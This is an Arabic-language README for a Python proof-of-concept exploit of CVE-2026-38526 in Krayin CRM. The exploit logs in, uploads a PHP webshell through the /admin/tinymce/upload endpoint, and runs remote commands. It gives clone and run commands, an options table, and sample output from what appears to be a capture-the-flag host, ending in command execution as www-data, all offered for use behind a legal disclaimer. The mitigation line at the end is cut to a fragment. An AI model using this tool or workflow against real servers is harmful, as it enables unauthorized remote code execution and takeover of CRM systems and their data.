
Python PoC يستغل CVE-2026-38526 في Krayin CRM <= 2.2.x: يقوم بالمصادقة، ويرفع PHP webshell عبر /admin/tinymce/upload، وينفذ الأوامر عن بُعد.
⚠️ تنبيه قانوني: هذا الكود مُقدَّم لأغراض تعليمية وللاختبارات المصرَّح بها فقط (CTF، bug bounty، مختبر خاص). المؤلف غير مسؤول عن أي استخدام غير قانوني.
Krayin CRM (Webkul) ≤ 2.2.x يكشف عن نقطة النهاية /admin/tinymce/upload
التي تتيح لمستخدم مُصادَق عليه (حتى بصلاحيات منخفضة)
رفع ملفات دون التحقق من الامتداد. يُخدَّم الملف
بعد ذلك من مجلد storage/، مما يتيح التنفيذ
التعسفي لكود PHP.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
الخيارات:
| الخيار | الوصف |
|---|---|
-t, --target | عنوان URL الجذر للهدف |
-u, --user | البريد الإلكتروني لحساب Krayin |
-p, --password | كلمة المرور |
-c, --command | الأمر المراد تنفيذه (الافتراضي: id) |
--login-path | مسار تسجيل الدخول (الافتراضي: /admin/login) |
--upload-path | مسار الرفع (الافتراضي: /admin/tinymce/upload) |
--timeout | مهلة HTTP (الافتراضي: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] استرجاع رمز CSRF من http://billing.nexus.htb/admin/login
[*] إرسال نموذج تسجيل الدخول
[+] تمت المصادقة بنجاح
[*] رفع x8f2k1ab.php عبر http://billing.nexus.htb/admin/tinymce/upload
[+] webshell متاح على: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] التنفيذ: id
============================================================
[+] الأمر: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ و uploads/.هذا المشروع منشور لأغراض البحث الأمني. أي استخدام ضد أنظمة دون إذن كتابي مسبق غير قانوني ومحظور تمامًا.